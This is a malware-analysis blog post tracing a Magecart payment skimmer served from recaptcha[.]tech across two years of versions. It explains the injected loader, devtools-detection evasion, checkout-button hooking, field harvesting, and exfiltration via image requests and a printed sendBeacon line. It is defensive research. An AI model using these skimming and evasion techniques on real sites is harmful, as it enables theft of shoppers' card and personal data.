The Evolution of a Magecart Attack Leveraging Recaptcha.tech Domain

Ben Baryo
PerimeterX
Published in
10 min readAug 25, 2021

A breakdown of an attack served from recaptcha[.]tech and its progression over the course of two years.

Magecart in the Wild

One of my roles as a researcher at PerimeterX is to scour the web in search of threats, map the techniques used by fraudsters, and develop countermeasures for both detection and prevention.

Usually, monitoring the threat landscape is all about analyzing the latest techniques that avoid detection and maximize cybercriminal profits. However, while researching one particular Magecart attack, I traced the development of a skimmer over the course of two years. I found that along with the skimmer creator’s skill development, the trend of generalization — moving from targeting specifically named fields and forms to writing code that will work on most e-commerce sites — was very evident.

While the techniques used in the attack are common, I followed the progress of the skimmer and the choices made by the fraudster who developed it. It was obvious that — just as any other software developer — the creator of this skimmer has also tackled issues of expanding support to other platforms, compatibility with different implementations, as well as improving their research evasion techniques.

The Attack

This attack was found running on a variety of retail websites, with no obvious connection between them. What caught my eye was its use of recaptcha in the name of the malicious domain: recaptcha.tech. This campaign seems to have been going on for quite a while, as the server was registered as early as July 2019, and immediately started serving malicious JavaScript. It isn’t flagged by any vendor as serving malicious content, but the only content I found linked to it were skimmers served on compromised sites.

As with any Magecart attack, it poses a risk of customer’s payment details and personally identifiable information (PII) being stolen, and exposes the site owners to fines for breach of data protection laws such as GDPR, CCPA or NYPA. This should be of concern to any retail, media or other digital enterprise site owners, as this can negatively impact their user confidence and brand reputation.

Breakdown of the Attack

All of the sites that were hit by this attack had an inline loader embedded on every page. Though injected, the skimmer only activated where it found at least one of its targeted elements: a checkout form’s Submit button. Let’s check out the code found on one of the targeted sites — one which was still live up until recently before the owner was contacted.

The Loader

The site itself was compromised, and an inline script was injected to the main HTML, loaded on every path. It loads the skimmer into the page by using jQuery’s ajax method, which not only fetches the content of the skimmer, but also automatically injects it to the page.

The Skimmer

Many of the variables, functions, and classes kept their original names (such as attackClass, tmp_keys, bad_keys, mobile, allow, crypt, format, update_data, etc…) even though the script was obfuscated. I have renamed the rest with more meaningful — though sometimes lengthy — names. The code, shown in this Github gist, is already deobfuscated, with the obfuscation functions and variables removed for readability’s sake.

The Flow

  1. The skimmer listens to keydown events and determines if the user opens the devtools using different key combinations. If such a combination is observed, a localStorage key is set and the attack ceases.
  2. The script detects whether the session is running on mobile by looking for strings indicating a mobile browser against the user agent string, along with whether ontouchstart exists in the window and if navigator.maxTouchPoints is bigger than 0.
  3. If the session isn’t running on mobile, another verification that the devtools are closed is initiated, this time by testing the difference between outer and inner window dimensions.
  4. If the devtools key does not exist in localStorage (i.e. there’s no indication of devtools being open), the script iterates over a list of hard-coded css selectors, most are clearly indicating form submit buttons, some with names of payment vendors such as Braintree, Wizgo, or OneStepCheckout, and if they exist, sets an event listener on them for mouseover events. It also marks them with an empty onrotate attribute to avoid redundancy.
  5. The script proceeds to iterate over all input, select, textarea, and selected option elements and collect their name/ID and their value.
  6. The collected data is encrypted with a hard-coded key — dev.recaptcha.stream and encoded.
  7. If the script has indications that the devtools are open, all the mouseover event listeners, as well as the keydown listener are deleted, and the attack ceases. The configuration is removed and important variables are cleared of values.
  8. Steps 2–7 repeat every half a second.
  9. Once the mouseover event is triggered, the collected data is sent via navigator.sendBeacon to a hard-coded URL, and the attack is stopped.

The Take

  • The existence of the loader as an inline script suggests the site itself has been compromised rather than this being a supply chain attack.
  • While some skimmers bring their own jQuery “just in case”, this loader (and actually all of the loaders identified as part of this campaign) requires jQuery to already be present at the site in order to fetch the skimmer.
  • The hard-coded list of target buttons to place the event listener on consists of a number of different identifiable payment vendors, suggesting that this is a generic attack, probably spread across different sites.
  • The generic collection of data from the input fields supports the previous assessment.

Diversion Meant for Human Eyes

The use of recaptcha in the domain, especially when the real Recaptcha is embedded in the site, is meant to throw off casual devtools peekers. It’s easy to understand how at a glance the malicious https://recaptcha.tech/client/js/api.js can be confused for the innocuous https://www.google.com/recaptcha/api.js.

Even the exfiltration url is disguised to look like a valid recaptcha endpoint — /verify.

Persistence is Key to Detecting Open Devtools

When you suspect there’s something wrong on a website, the first step is to open the developer tools window and look around. Peek in the Network tab to see if there’s any communication with an unfamiliar domain, or go over to the Sources tab to look for anything suspicious in the code. Perhaps you’d discover an out-of-place element in the Elements tab. There are a lot of ways to find attack indicators just by poking around the devtools, so there’s an incentive for skimmers to recognize if they’re being observed and to cease their operation.

This attack is no different in that aspect. It employs a common method to check if the devtools are open by comparing the outer and inner window size. While most skimmers simply avoid running when possibly being monitored, this one also installs a keylogger that monitors the last 3 keydown events that took place. It looks for specific combinations starting with ctrl and shift, where the last event was of one of its so called “bad keys” which are used to open the devtools (or view source) on Windows, Mac, or using Chrome, Safari, or Opera. The commonly used F12 key is also monitored.

Once either mechanism determines the devtools were opened, a localStorage key is saved with its value set as the current datetime. The non-existence of this key is verified when the attack starts. If the key exists and is older than 3 hours, it is deleted. Otherwise, the attack is halted.

Evolution of a Skimmer: Getting More Classy

As previously mentioned, this campaign isn’t new, and while some attacks are still live, earlier iterations can be tracked all the way back to July 2019 when the server was registered. I went back and dug up previous versions of the skimmer served from the same domain and found it interesting to see the development of the skimmer, especially between its earliest version and the latest one.

Breakdown of an Earlier Attack

Here’s the earlier version of the skimmer. The loader was almost the same as the latest version, so I skipped it to avoid code clutter.

The Skimmer

The code, shown in this Github gist, was deobfuscated with the obfuscation functions and variables removed for readability. The functions and variables were then renamed according to the latest version in order to simplify the comparison.

The Flow

Here’s how this early version performed the skimming:

  1. When the window is resized, a check for whether the devtools were open would run by testing the difference between outer and inner window dimensions. A localStorage key would be set if the devtools were detected.
  2. The localStorage key is checked on every second, removing any data the skimmer may have already collected if it exists, or removing the key if more than an hour has passed since setting it.
  3. The script checks if a button exists by looking for a hard-coded css selector 4 times a second.
  4. Once the button is located, the script marks it by setting an attribute on it, clones it, adds an event listener for clicks, and replaces the original with the clone while keeping the original stashed away.
  5. When the user clicks on the button, a hard-coded list of fields is collected and stored in the localStorage, under a different key than the one used for detecting devtools.
  6. The script creates an Image tag and disguises it as a 1 pixel gif file, though the actual destination is a php file, with the payload attached as part of the otherwise hard-coded query string.
  7. Once the Image tag is added to the DOM, the script removes that newly injected image tag as well as the collected data stored in the localStorage, replaces the clone with the original node, and clicks the original button.

The Differences

The first thing I noticed was that this is a straightforward linear script, without the more structured class and methods. But the fraudster’s improving coding skills isn’t really why I thought it interesting to compare versions;
the expanding scope is.

The comparison shows obvious signs of improvement — not just in the script’s structure and techniques, but also in the ability to target more sites with the same code without requiring to adjust the code per attack.

I will focus on 3 key areas in which I noticed specific improvements: field targeting, button hooking, and data exfiltration.

Field Targeting

The earliest version operates by hard-coding the css selectors matching the targeted input fields and the attributes that should be harvested from them.

These are specifically selected to match a certain payment provider or framework which uses these hard-coded IDs.

A later version moves from hard-coded IDs to naming the tag name along with its name attribute, perhaps due to a change in the framework or a change in the targets of this attack.

In this intermediate version, additional information on country code and state is specifically collected. The collection itself, including the switch statement, is kept the same.

In the latest version, the code iterates over all input, select, and textarea fields found on the page, dynamically extracting their name/ID and the attribute relevant for them that contains the targeted data:

This strategy allows the same script to run on pretty much any page that provides access to these input fields without any need for modification.

Button Hooking

The design choice for when to start the actual harvesting has also been revisited between the earliest version and the intermediate one, not changing again for any future version.

The earliest version started the attack after the replacement button was clicked:

The intermediate version brought on a change in the timing data collection — now collecting in an interval, not bound to a click on the submit button, which only initiated the data exfiltration:

You’ll also notice that the targeted button’s css selector has changed, probably targeting a different payment provider.

The version that came after that already made the jump from replacing the button to hooking the original. It used an object where the css selector for a checkout button possibly on the page is the key, and the value notes whether it has been hooked (useful to avoid double-hooking and to remove hooking when the attack is completed):

The latest version does away with the objects object (but keeps the name) and simply sets an innocuous attribute on hooked buttons. Notice the newly added css selectors, which suggests this version caters to a much broader selection of possible targets:

Data Exfiltration

Another interesting change is the techniques used to exfiltrate the stolen data back to the fraudster’s server.

The earliest version injects an image element and sets the src attribute to point at the fraudster’s server. The encrypted stolen data hides as part of the query string, which also includes some “noise” to make this request seem less suspicious.

You’ll notice how the width and height of the element was set to 1x1 similar to a tracking pixel. I’m not sure if at that time the server actually returned a pixel response, but in any case, another function running in intervals of 4 times a second would search for this image element and remove it once it was found.

A later intermediate version made the change to send the data not when the button was clicked, but when the mouse hovered over the button. Instead of using the image.src technique, it utilized the sendBeacon function, which did not elicit a response from the target server. Was this a way to lower costs or to simply expedite the exfiltration?

send() {navigator.sendBeacon(config.backend, config.data);}

I would venture a guess that hooking the button instead of replacing it, and using mouseover together with this sendBeacon technique, are all part of the attempt to be less intrusive and change the flow of the site. This might end up breaking the site, making the attack more noisy and possibly alerting the users and the owner of the site to it.

Between employing more techniques to identify when the script is being observed (open devtools), limiting the scope of the variables, and cleaning up when the attack is halted, there is an observable active effort made by the fraudster to avert research and detection of the attack.

To Recap(tcha)

This skimmer evolved over the course of two years, from an attack targeting specific fields on a single site configuration into a generic attack that is compatible with a range of frameworks or payment providers.

Over time, some techniques were enhanced in quality, ensuring the skimmer ran its course while also improving anti-research protection. Others — like the use of a key in the localStorage to halt the attack, and the encryption functions — remained the same. If a certain method works, like hiding behind a server evoking the name recaptcha, why change it? Keep in mind that while this skimmer does not exhibit any advanced characteristics that would prove a challenge to most detection solutions, it still ran uninterrupted for quite a while, probably due in part to its maintainer’s adaptability.

--

--